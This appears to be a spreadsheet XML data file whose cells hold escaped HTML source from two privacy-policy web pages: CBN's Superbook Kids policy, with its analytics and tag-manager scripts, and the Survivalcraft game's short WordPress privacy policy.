		&lt;meta property="og:description" content="This Kids' Privacy Policy supplements CBN's Privacy Policy by providing additional privacy measures for children who visit the Superbook Kids website in compliance with the Children's Online Privacy Protection Act (COPPA)."&gt;_x005F_x000D_
		&lt;meta property="og:type" content="website"&gt;_x005F_x000D_
		&lt;meta property="og:image" content="https://cdn.superbook.cbn.com/sites/all/themes/custom/superbook/images/content/default_ss_image.jpg"&gt;_x005F_x000D_
_x005F_x000D_
		&lt;link href="https://cdn.superbook.cbn.com/sites/all/themes/custom/superbook/css/jquery.smartbanner.css?bust=4.0.16sept2022" media="screen" rel="stylesheet"&gt;_x005F_x000D_
		&lt;link href="https://cdn.superbook.cbn.com/sites/all/themes/custom/superbook/css/animate.min.css?bust=4.0.16sept2022" media="screen" rel="stylesheet"&gt;_x005F_x000D_
		&lt;link href="/sites/all/themes/custom/superbook/css/en1.css?bust=4.0.16sept2022" media="screen" rel="stylesheet"&gt;_x005F_x000D_
        &lt;link href="/sites/all/themes/custom/superbook/css/en2.css?bust=4.0.16sept2022" media="screen" rel="stylesheet"&gt;_x005F_x000D_
		&lt;link href="" media="screen" rel="stylesheet"&gt;_x005F_x000D_
		&lt;!-- OneTrust Cookies Consent Notice start for superbook.cbn.com --&gt;_x005F_x000D_
		&lt;!--_x005F_x000D_
		&lt;script type="text/javascript" src="https://cdn.cookielaw.org/consent/4a1c13ba-14d4-4e49-847b-20fb45d5797f-test/OtAutoBlock.js" &gt;&lt;/script&gt;_x005F_x000D_
		&lt;script src="https://cdn.cookielaw.org/scripttemplates/otSDKStub.js" data-document-language="true" type="text/javascript" charset="UTF-8" data-domain-script="4a1c13ba-14d4-4e49-847b-20fb45d5797f-test" &gt;&lt;/script&gt;_x005F_x000D_
		</t>
  </si>
  <si>
    <t>&lt;script type="text/javascript"&gt;_x005F_x000D_
		function OptanonWrapper() { }_x005F_x000D_
		&lt;/script&gt;_x005F_x000D_
		--&gt;_x005F_x000D_
		&lt;!-- OneTrust Cookies Consent Notice end for superbook.cbn.com --&gt;_x005F_x000D_
		&lt;script src="//www.cbn.com/Scripts/s_code_community.aspx"&gt;&lt;/script&gt;_x005F_x000D_
_x005F_x000D_
		_x005F_x000D_
_x005F_x000D_
		&lt;script language="javascript" type="text/javascript" src="//www.cbn.com/scripts/mbox.js"&gt;&lt;/script&gt;_x005F_x000D_
		&lt;script&gt;_x005F_x000D_
			try{dataLayer=window.dataLayer||[];if(typeof(gtmDataPart)!="undefined"){dataLayer.push({_x005F_x000D_
			'userId':gtmDataPart.userId,_x005F_x000D_
			'cpId':gtmDataPart.cpId,_x005F_x000D_
			'weekdayWeekend':gtmDataPart.weekdayWeekend,_x005F_x000D_
			'loginStatus':gtmDataPart.loginStatus,_x005F_x000D_
			'cbnContact':gtmDataPart.cbnContact,_x005F_x000D_
			'fullURL':gtmDataPart.fullURL,_x005F_x000D_
			'contactSource':gtmDataPart.contactSource,_x005F_x000D_
			'donorLevel':gtmDataPart.donorLevel,_x005F_x000D_
			'partner':gtmDataPart.partner,_x005F_x000D_
			'ltvGroup':gtmDataPart.ltvGroup,_x005F_x000D_
			'contentKeywords':gtmDataPart.contentKeywords,_x005F_x000D_
			'debugMsg':gtmDataPart.debugMsg,_x005F_x000D_
			'superbookLoginStatus':gtmDataPart.superbookLoggedInStatus,_x005F_x000D_
			'dayofYear':gtmDataPart.dayofYear,_x005F_x000D_
			'motivationCode':gtmDataPart.motivationCode,_x005F_x000D_
			'subSection':gtmDataPart.subSection,_x005F_x000D_
			'subSection2':gtmDataPart.subSection2,_x005F_x000D_
			'subSection3':gtmDataPart.subSection3,_x005F_x000D_
			'contentType':gtmDataPart.contentType,_x005F_x000D_
			'siteSections':gtmDataPart.siteSections,_x005F_x000D_
			'cbnAppName':gtmDataPart.appName,_x005F_x000D_
			'featuredContentId':gtmDataPart.featuredContentId_x005F_x000D_
			});}}catch(err){}_x005F_x000D_
		&lt;/script&gt;_x005F_x000D_
		&lt;!-- Google Tag Manager --&gt;_x005F_x000D_
		&lt;script&gt;_x005F_x000D_
			var gtmId;if(typeof(gtmContainerId)!="undefined"){gtmId=gtmContainerId;}_x005F_x000D_
			(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start': new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&amp;l='+l:'';j.async=true;j.src='//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','d</t>
  </si>
  <si>
    <t>class="c7 lst-kix_list_2-1 start" start="1"&gt;&lt;li class="c3"&gt;&lt;span class="c0"&gt;This Privacy Policy is drafted with adherence to the applicable privacy protection laws, including following legislation:&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;ol class="c7 lst-kix_list_2-2 start" start="1"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;California Consumer Privacy Act (&amp;ldquo;CCPA&amp;rdquo;):&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c28 c17 c22"&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=http://leginfo.legislature.ca.gov/faces/codes_displayText.xhtml?lawCode%3DCIV%26division%3D3.%26title%3D1.81.5.%26part%3D4.%26chapter%3D%26article%3D&amp;amp;sa=D&amp;amp;ust=1607602738195000&amp;amp;usg=AOvVaw1GX84Nj_uTAVhP_iQVrCQl"&gt;http://leginfo.legislature.ca.gov/faces/codes_displayText.xhtml?lawCode=CIV&amp;amp;division=3.&amp;amp;title=1.81.5.&amp;amp;part=4.&amp;amp;chapter=&amp;amp;article=&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;ol class="c7 lst-kix_list_2-2" start="2"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;Children&amp;#39;s Online Privacy Protection Rule (&amp;quot;COPPA&amp;quot;)&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c17 c22 c28"&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://uscode.house.gov/view.xhtml?path%3D/prelim@title15/chapter91%26edition%3Dprelim&amp;amp;sa=D&amp;amp;ust=1607602738195000&amp;amp;usg=AOvVaw1ibRjxFnA98UgMN4qnvOD0"&gt;https://uscode.house.gov/view.xhtml?path=/&lt;span class="__cf_email__" data-cfemail="acdcdec9c0c5c1ecd8c5d8c0c99d99"&gt;[email&amp;#160;protected]&lt;/span&gt;/chapter91&amp;amp;edition=prelim&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;ol class="c7 lst-kix_list_2-2" start="3"&gt;&lt;li class="c6"&gt;&lt;span class="c0"&gt;Regulation (EU) 2016/679 of the European Parliament and of the Council of 27 April 2016 on the protection of natural persons with regard to the processing of personal data and on the free movement of such data, and repealing Directive 95/46/EC (General Data Protection Regulation or &amp;ldquo;GDPR&amp;rdquo;)&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="c8 c17 c22"&gt;&lt;span class="c0"&gt;&lt;a class="c5" href="https://www.google.com/url?q=https://eur-lex.europa.eu/eli/reg/2016/679/oj&amp;amp;sa=D&amp;amp;ust=1607602738196000&amp;amp;usg=AOvVaw0TkrFZDgyzmJSErWWHEgXD"&gt;https://eur-lex.europa.eu/eli/reg/2016/679/oj&lt;/a&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="c8 c12"&gt;&lt;span</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"&gt;
&lt;html xmlns="http://www.w3.org/1999/xhtml" lang="en"&gt;
&lt;head profile="http://gmpg.org/xfn/11"&gt;
	&lt;title&gt;Survivalcraft Privacy Policy &amp;laquo; Survivalcraft&lt;/title&gt;
	&lt;meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /&gt;
	&lt;link rel="stylesheet" href="https://s2.wp.com/wp-content/themes/pub/sandbox-162/style.css" type="text/css" media="screen" /&gt;
	&lt;link rel="pingback" href="https://kaalus.wordpress.com/xmlrpc.php" /&gt;
		&lt;meta name='robots' content='max-image-preview:large' /&gt;
&lt;link rel='dns-prefetch' href='//s0.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//s1.wp.com' /&gt;
&lt;link rel='dns-prefetch' href='//s2.wp.com' /&gt;
&lt;link href='https://fonts.gstatic.com' crossorigin rel='preconnect' /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Survivalcraft &amp;raquo; Feed" href="https://kaalus.wordpress.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Survivalcraft &amp;raquo; Comments Feed" href="https://kaalus.wordpress.com/comments/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Survivalcraft &amp;raquo; Survivalcraft Privacy Policy Comments Feed" href="https://kaalus.wordpress.com/survivalcraft-privacy-policy/feed/" /&gt;
	&lt;script type="text/javascript"&gt;
		/* &lt;! [CDATA[ */
		function addLoadEvent(func) {
			var oldonload = window.onload;
			if (typeof window.onload !</t>
  </si>
  <si>
    <t>important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link crossorigin='anonymous' rel='stylesheet' id='all-css-0-1' href='https://s1.wp.com/wp-content/plugins/gutenberg-core/v15.5.1/build/block-library/style.css?m=1681323244h&amp;cssminify=yes' type='text/css' media='all' /&gt;
&lt;style id='wp-block-library-inline-css'&gt;
.has-text-align-justify {
	text-align:justify;
}
.wp-block-cover__image-background.has-parallax {
	background-size: cover;
}
&lt;/style&gt;
&lt;link crossorigin='anonymous' rel='stylesheet' id='all-css-2-1' href='https://s0.wp.com/_static/??-eJyVj91uwjAMhV8IN0xi/FygPUvqWsE0SaPYEfTtZ4SYBpsqcRP52P58TtylAGeMbSBxZ3GJBvYUKVHWJ1Gin6lCpOBx7hLnDkVWbgm32W/9BOGU9bZTYgucxYVmsqcaoI8TjnaMtHgcwWynphAqD050jvT+ieqVc5AX/Ce2NRxGL8IIerKo8m/S1ODhhFMl66fi/35yAbvwEEjvhvcalK7LSDEb6PtSSQTsTdzSI6VxX+n4sd3tD7v1+nNz/gajQq3w&amp;cssminify=yes' type='text/css' media='all' /&gt;
&lt;style id='global-styles-inline-css'&gt;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100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--font-family--albert-sans: 'Albert Sans';--wp--preset--font-family--alegreya: Alegreya;--wp--preset--font-family--arvo: Arvo;--wp--preset--font-family--bodoni-moda: 'Bodoni Moda';--wp--preset--font-family--cabin: Cabin;--wp--preset--font-family--chivo: Chivo;--wp--preset--font-family--commissioner: Commissioner;--wp--preset--font-family--cormorant: Cormorant;--wp--preset--font-family--courier-prime: 'Courier Prime';--wp--preset--font-family--crimson-pro: 'Crimson Pro';--wp--preset--font-family--dm-mono: 'DM Mono';--wp--preset--font-family--dm-sans: 'DM Sans';--wp--preset--font-family--domine: Domine;--wp--preset--font-family--eb-garamond: 'EB Garamond';--wp--preset--font-family--epilogue: Epilogue;--wp--preset--font-family--figtree: Figtree;--wp--preset--font-family--fira-sans: 'Fira Sans';--wp--preset--font-family--fraunces: Fraunces;--wp--preset--font-family--ibm-plex-mono: 'IBM Plex Mono';--wp--preset--font-family--ibm-plex-sans: 'IBM Plex Sans';--wp--preset--font-family--inter: Inter;--wp--preset--font-family--josefin-sans: 'Josefin Sans';--wp--preset--font-family--jost: Jost;--wp--preset--font-family--libre-baskerville: 'Libre Baskerville';--wp--preset--font-family--libre-franklin: 'Libre Franklin';--wp--preset--font-family--literata: Literata;--wp--preset--font-family--lora: Lora;--wp--preset--font-family--merriweather: Merriweather;--wp--preset--font-family--montserrat: Montserrat;--wp--preset--font-family--newsreader: Newsreader;--wp--preset--font-family--nunito: Nunito;--wp--preset--font-family--open-sans: 'Open Sans';--wp--preset--font-family--overpass: Overpass;--wp--preset--font-family--petrona: Petrona;--wp--preset--font-family--piazzolla: Piazzolla;--wp--preset--font-family--playfair-display: 'Playfair Display';--wp--preset--font-family--plus-jakarta-sans: 'Plus Jakarta Sans';--wp--preset--font-family--poppins: Poppins;--wp--preset--font-family--raleway: Raleway;--wp--preset--font-family--roboto-slab: 'Roboto Slab';--wp--preset--font-family--roboto: Roboto;--wp--preset--font-family--rubik: Rubik;--wp--preset--font-family--sora: Sora;--wp--preset--font-family--source-sans-pro: 'Source Sans Pro';--wp--preset--font-family--source-serif-pro: 'Source Serif Pro';--wp--preset--font-family--space-mono: 'Space Mono';--wp--preset--font-family--texturina: Texturina;--wp--preset--font-family--work-sans: 'Work Sans';--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp:</t>
  </si>
  <si>
    <t>important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) ! important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) ! important;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
&lt;/style&gt;
&lt;link crossorigin='anonymous' rel='stylesheet' id='all-css-4-1' href='https://s1.wp.com/_static/??-eJx9jEEKwjAQRS9kHCoa6EI8S0zHkDrJDJkppbc3iosuxN178N+HVVzkalgNyuKElpSrwowmIT6/DtJ4WqJlrlA6ESqseUpoCsbihLWT2kZ4jKoH+H2akB1xDJ+fvbgHhdz+pQ3vxKljgr7a6Tu6levgL/58Gkc/zC89FE6m&amp;cssminify=yes' type='text/css' media='all' /&gt;
&lt;link crossorigin='anonymous' rel='stylesheet' id='print-css-5-1' href='https://s2.wp.com/wp-content/mu-plugins/global-print/global-print.css?m=1465851035h&amp;cssminify=yes' type='text/css' media='print' /&gt;
&lt;style id='jetpack-global-styles-frontend-style-inline-css'&gt;
:root { --font-headings: unset; --font-base: unset; --font-headings-default: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif; --font-base-default: -apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Oxygen-Sans,Ubuntu,Cantarell,"Helvetica Neue",sans-serif;}
&lt;/style&gt;
&lt;link crossorigin='anonymous' rel='stylesheet' id='all-css-8-1' href='https://s0.wp.com/wp-content/themes/h4/global.css?m=1420737423h&amp;cssminify=yes' type='text/css' media='all' /&gt;
&lt;script id='wpcom-actionbar-placeholder-js-extra'&gt;
var actionbardata = {"siteID":"19032272","siteURL":"http:\/\/kaalus.wordpress.com","xhrURL":"https:\/\/kaalus.wordpress.com\/wp-admin\/admin-ajax.php","nonce":"316221b1ac","isLoggedIn":"","statusMessage":"","subsEmailDefault":"instantly","proxyScriptUrl":"https:\/\/s0.wp.com\/wp-content\/js\/wpcom-proxy-request.js?ver=20211021","shortlink":"https:\/\/wp.me\/P1hRa8-zK","i18n":{"followedText":"New posts from this site will now appear in your &lt;a href=\"https:\/\/wordpress.com\/read\"&gt;Reader&lt;\/a&gt;","foldBar":"Collapse this bar","unfoldBar":"Expand this bar"}};
&lt;/script&gt;
&lt;script crossorigin='anonymous' type='text/javascript' src='https://s1.wp.com/_static/??/wp-content/js/mobile-useragent-info.js,/wp-content/plugins/video/assets/js/videojs/videopress-iframe-api.js,/wp-content/js/rlt-proxy.js?m=1674235413j'&gt;&lt;/script&gt;
&lt;script type='text/javascript'&gt;
	window.addEventListener( 'DOMContentLoaded', function() {
		rltInitialize( {"token":null,"iframeOrigins":["https:\/\/widgets.wp.com"]} );
	} );
&lt;/script&gt;
&lt;link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://kaalus.wordpress.com/xmlrpc.php?rsd" /&gt;
&lt;link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://s1.wp.com/wp-includes/wlwmanifest.xml" /&gt;
&lt;meta name="generator" content="WordPress.com" /&gt;
&lt;link rel="canonical" href="https://kaalus.wordpress.com/survivalcraft-privacy-policy/" /&gt;
&lt;link rel='shortlink' href='https://wp.me/P1hRa8-zK' /&gt;
&lt;link rel="alternate" type="application/json+oembed" href="https://public-api.wordpress.com/oembed/?format=json&amp;amp;url=https%3A%2F%2Fkaalus.wordpress.com%2Fsurvivalcraft-privacy-policy%2F&amp;amp;for=wpcom-auto-discovery" /&gt;&lt;link</t>
  </si>
  <si>
    <t>rel="alternate" type="application/xml+oembed" href="https://public-api.wordpress.com/oembed/?format=xml&amp;amp;url=https%3A%2F%2Fkaalus.wordpress.com%2Fsurvivalcraft-privacy-policy%2F&amp;amp;for=wpcom-auto-discovery" /&gt;
&lt;!-- Jetpack Open Graph Tags --&gt;
&lt;meta property="og:type" content="article" /&gt;
&lt;meta property="og:title" content="Survivalcraft Privacy Policy" /&gt;
&lt;meta property="og:url" content="https://kaalus.wordpress.com/survivalcraft-privacy-policy/" /&gt;
&lt;meta property="og:description" content="Effective date: April 03, 2023 Candy Rufus Games operates the Survivalcraft mobile application. You can contact us at candyrufusgames@gmail.com for any questions about this policy.</t>
  </si>
  <si>
    <t>Survivalcraft do…" /&gt;
&lt;meta property="article:published_time" content="2015-04-14T11:26:06+00:00" /&gt;
&lt;meta property="article:modified_time" content="2023-04-03T19:54:18+00:00" /&gt;
&lt;meta property="og:site_name" content="Survivalcraft" /&gt;
&lt;meta property="og:image" content="https://kaalus.files.wordpress.com/2019/10/highresapplicationicon.jpg?w=200" /&gt;
&lt;meta property="og:image:width" content="200" /&gt;
&lt;meta property="og:image:height" content="200" /&gt;
&lt;meta property="og:image:alt" content="" /&gt;
&lt;meta property="og:locale" content="en_US" /&gt;
&lt;meta property="fb:app_id" content="249643311490" /&gt;
&lt;meta property="article:publisher" content="https://www.facebook.com/WordPresscom" /&gt;
&lt;meta name="twitter:text:title" content="Survivalcraft Privacy Policy" /&gt;
&lt;meta name="twitter:image" content="https://kaalus.files.wordpress.com/2019/10/highresapplicationicon.jpg?w=240" /&gt;
&lt;meta name="twitter:card" content="summary" /&gt;
&lt;!-- End Jetpack Open Graph Tags --&gt;
&lt;link rel='openid.server' href='https://kaalus.wordpress.com/?openidserver=1' /&gt;
&lt;link rel='openid.delegate' href='https://kaalus.wordpress.com/' /&gt;
&lt;link rel="search" type="application/opensearchdescription+xml" href="https://kaalus.wordpress.com/osd.xml" title="Survivalcraft" /&gt;
&lt;link rel="search" type="application/opensearchdescription+xml" href="https://s1.wp.com/opensearch.xml" title="WordPress.com" /&gt;
		&lt;style id="wpcom-hotfix-masterbar-style"&gt;
			@media screen and (min-width: 783px) {
				#wpadminbar .quicklinks li#wp-admin-bar-my-account.with-avatar &gt; a img {
					margin-top: 5px;
				}
			}
		&lt;/style&gt;
				&lt;style type="text/css"&gt;
			.recentcomments a {
				display: inline ! important;
				padding: 0 !important;
				margin: 0 !important;
			}
			table.recentcommentsavatartop img.avatar, table.recentcommentsavatarend img.avatar {
				border: 0px;
				margin: 0;
			}
			table.recentcommentsavatartop a, table.recentcommentsavatarend a {
				border: 0px !important;
				background-color: transparent !important;
			}
			td.recentcommentsavatarend, td.recentcommentsavatartop {
				padding: 0px 0px 1px 0px;
				margin: 0px;
			}
			td.recentcommentstextend {
				border: none !important;
				padding:</t>
  </si>
  <si>
    <t>0px 0px 2px 10px;
			}
			.rtl td.recentcommentstextend {
				padding: 0px 10px 2px 0px;
			}
			td.recentcommentstexttop {
				border: none;
				padding: 0px 0px 0px 10px;
			}
			.rtl td.recentcommentstexttop {
				padding: 0px 10px 0px 0px;
			}
		&lt;/style&gt;
		&lt;meta name="application-name" content="Survivalcraft" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>name="msapplication-window" content="width=device-width;height=device-height" /&gt;&lt;meta name="msapplication-tooltip" content="A ship maroons you on the shores of an infinite block world." /&gt;&lt;meta name="msapplication-task" content="name=Subscribe;action-uri=https://kaalus.wordpress.com/feed/;icon-uri=https://kaalus.files.wordpress.com/2019/10/highresapplicationicon.jpg?w=16" /&gt;&lt;meta</t>
  </si>
  <si>
    <t>name="msapplication-task" content="name=Sign up for a free blog;action-uri=http://wordpress.com/signup/;icon-uri=https://s1.wp.com/i/favicon.ico" /&gt;&lt;meta name="msapplication-task" content="name=WordPress.com Support;action-uri=http://support.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /&gt;&lt;meta name="msapplication-task" content="name=WordPress.com Forums;action-uri=http://forums.wordpress.com/;icon-uri=https://s1.wp.com/i/favicon.ico" /&gt;&lt;meta name="description" content="Effective date: April 03, 2023 Candy Rufus Games operates the Survivalcraft mobile application.</t>
  </si>
  <si>
    <t>You can contact us at candyrufusgames@gmail.com for any questions about this policy. Survivalcraft does not collect or transmit any user sensitive data. Survivalcraft may from time to time transmit a small amount of diagnostic data, which is used solely to identify and&amp;hellip;" /&gt;
&lt;link rel="icon" href="https://kaalus.files.wordpress.com/2019/10/highresapplicationicon.jpg?w=32" sizes="32x32" /&gt;
&lt;link rel="icon" href="https://kaalus.files.wordpress.com/2019/10/highresapplicationicon.jpg?w=192" sizes="192x192" /&gt;
&lt;link rel="apple-touch-icon" href="https://kaalus.files.wordpress.com/2019/10/highresapplicationicon.jpg?w=180" /&gt;
&lt;meta name="msapplication-TileImage" content="https://kaalus.files.wordpress.com/2019/10/highresapplicationicon.jpg?w=270" /&gt;
&lt;/head&gt;
&lt;body class="wordpress y2023 m04 d13 h00 page pageid-2216 page-author-kaalus customizer-styles-applied highlander-enabled highlander-light"&gt;
&lt;div id="wrapper" class="hfeed"&gt;
	&lt;div id="header"&gt;
		&lt;h1 id="blog-title"&gt;&lt;span&gt;&lt;a href="https://kaalus.wordpress.com/" title="Survivalcraft" rel="home"&gt;Survivalcraft&lt;/a&gt;&lt;/span&gt;&lt;/h1&gt;
		&lt;div id="blog-description"&gt;A ship maroons you on the shores of an infinite block world.&lt;/div&gt;
	&lt;/div&gt;&lt;!--  #header --&gt;
	&lt;div id="access"&gt;
		&lt;div class="skip-link"&gt;&lt;a href="#content" title="Skip to content"&gt;Skip to content&lt;/a&gt;&lt;/div&gt;
		&lt;div class="menu-header"&gt;&lt;ul id="menu-main" class="menu"&gt;&lt;li id="menu-item-372" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-372"&gt;&lt;a href="https://kaalus.wordpress.com/faq/"&gt;FAQ&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-177" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-177"&gt;&lt;a href="http://survivalcraft.lefora.com/"&gt;Forum&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-3382" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3382"&gt;&lt;a href="https://kaalus.wordpress.com/screenshots/"&gt;Screenshots&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-652" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-652"&gt;&lt;a href="https://www.youtube.com/user/kaalus"&gt;YouTube&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-531" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-531"&gt;&lt;a href="https://kaalus.wordpress.com/media/"&gt;Files/Technical&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-687" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-687"&gt;&lt;a href="http://twitter.com/#!/CandyRufusGames"&gt;Twitter&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-1329" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1329"&gt;&lt;a href="https://kaalus.wordpress.com/updates-history/"&gt;Updates History&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-407" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-407"&gt;&lt;a href="http://survivalcraftgame.wikia.com/"&gt;Wiki&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-4880" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4880"&gt;&lt;a href="https://kaalus.wordpress.com/bugs-game/"&gt;Bugs Game&lt;/a&gt;&lt;/li&gt;
&lt;li id="menu-item-5983" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5983"&gt;&lt;a href="https://kaalus.wordpress.com/ruthless-conquest/"&gt;Ruthless Conquest&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;	&lt;/div&gt;&lt;!--</t>
  </si>
  <si>
    <t>#access --&gt;
	&lt;div id="container"&gt;
		&lt;div id="content"&gt;
			&lt;div id="post-2216" class="hentry p1 page publish author-kaalus untagged y2015 m04 d14 h13"&gt;
				&lt;h2 class="entry-title"&gt;Survivalcraft Privacy Policy&lt;/h2&gt;
				&lt;div class="entry-content"&gt;
&lt;p&gt;Effective date: April 03, 2023&lt;/p&gt;
&lt;p&gt;Candy Rufus Games operates the Survivalcraft mobile application. You can contact us at &lt;a href="mailto:candyrufusgames@gmail.com"&gt;candyrufusgames@gmail.com&lt;/a&gt; for any questions about this policy.&lt;/p&gt;
&lt;p&gt;Survivalcraft does not collect or transmit any user sensitive data.&lt;/p&gt;
&lt;p&gt;Survivalcraft may from time to time transmit a small amount of diagnostic data, which is used solely to identify and correct problems with the application, such as crashes or hangs. This data does not contain any information that might be used to identify the user.</t>
  </si>
  <si>
    <t>It contains technical information only, such as application call stacks or amount of free space available on the device.&lt;/p&gt;
&lt;p&gt; This diagnostic data is not shared with any third parties.&lt;/p&gt;
				&lt;/div&gt;
			&lt;/div&gt;&lt;!-- .post --&gt;
			&lt;div id="comments"&gt;
&lt;div class="navigation"&gt;
 &lt;/div&gt;
			&lt;/div&gt;&lt;!--</t>
  </si>
  <si>
    <t xml:space="preserve">#comments --&gt;
		&lt;/div&gt;&lt;!-- #content --&gt;
	&lt;/div&gt;&lt;!-- #container --&gt;
	&lt;div id="primary" class="sidebar"&gt;
				&lt;ul class="xoxo"&gt;
			&lt;li id="text-10" class="widget widget_text"&gt;			&lt;div class="textwidget"&gt;&lt;p&gt;&lt;a href="https://kaalus.files.wordpress.com/2019/10/highresapplicationicon.jpg"&gt;&lt;img decoding="async" class="aligncenter" src="https://kaalus.files.wordpress.com/2019/10/highresapplicationicon.jpg?w=150" alt="" /&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
			&lt;/li&gt;
			&lt;li id="text-8" class="widget widget_text"&gt;
				&lt;h3 class="widgettitle"&gt;Supported Platforms&lt;/h3&gt;
			&lt;div class="textwidget"&gt;&lt;p&gt;
&lt;a href="https://play.google.com/store/apps/details?id=com.candyrufusgames.survivalcraft2"&gt;
&lt;img src="https://kaalus.files.wordpress.com/2012/11/googleplay.png" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;a href="http://www.amazon.com/gp/mas/dl/android?p=com.candyrufusgames.survivalcraft2a"&gt;
&lt;img src="https://kaalus.files.wordpress.com/2012/11/amazonappstore.png" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;a href="https://itunes.apple.com/app/survivalcraft2/id1185580782"&gt;
&lt;img src="https://kaalus.files.wordpress.com/2013/04/appstorebadge1.png" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;
&lt;a href="https://www.microsoft.com/store/apps/9phc48p58nb2"&gt;
&lt;img src="https://kaalus.files.wordpress.com/2015/04/windowsstorebadge.png" /&gt;
&lt;/a&gt;
&lt;/p&gt;&lt;/div&gt;
			&lt;/li&gt;
			&lt;li id="search" class="widget widget_search"&gt;				
				&lt;h3 class="widgettitle"&gt;&lt;label for="s"&gt;Search&lt;/label&gt;&lt;/h3&gt;
				&lt;form id="searchform" class="blog-search" method="get" action="https://kaalus.wordpress.com/"&gt;
					&lt;div&gt;
						&lt;input id="s" name="s" type="text" class="text" value="" size="10" tabindex="1" /&gt;
						&lt;input type="submit" class="button" value="Go" tabindex="2" /&gt;
					&lt;/div&gt;
				&lt;/form&gt;
			&lt;/li&gt;
			&lt;li id="text-9" class="widget widget_text"&gt;			&lt;div class="textwidget"&gt;&lt;h3&gt;&lt;a href="http://survivalcraft.lefora.com"&gt;Survivalcraft Forum&lt;/a&gt;&lt;/h3&gt;_x005F_x000D_
Visit it if you want to read what others have to say about the game, ask a question, request a feature or report a bug.&lt;/div&gt;
			&lt;/li&gt;
			&lt;li id="text-7" class="widget widget_text"&gt;
				&lt;h3 class="widgettitle"&gt;About me&lt;/h3&gt;
			&lt;div class="textwidget"&gt;Hi, I'm Kaalus. I've been working on Survivalcraft since 2011 to bring blocky world joy to mobile device owners.
 You can contact me at candy rufus games at gmail dot com (remove spaces from the username).
</t>
  </si>
  <si>
    <t>&lt;/div&gt;
			&lt;/li&gt;
			&lt;li id="blog-stats-2" class="widget widget_blog-stats"&gt;
				&lt;h3 class="widgettitle"&gt;Stats&lt;/h3&gt;
		&lt;ul&gt;
			&lt;li&gt;16,003,876 views&lt;/li&gt;
		&lt;/ul&gt;
			&lt;/li&gt;
			&lt;li id="top-posts-3" class="widget widget_top-posts"&gt;
				&lt;h3 class="widgettitle"&gt;Top Posts &amp;amp; Pages&lt;/h3&gt;
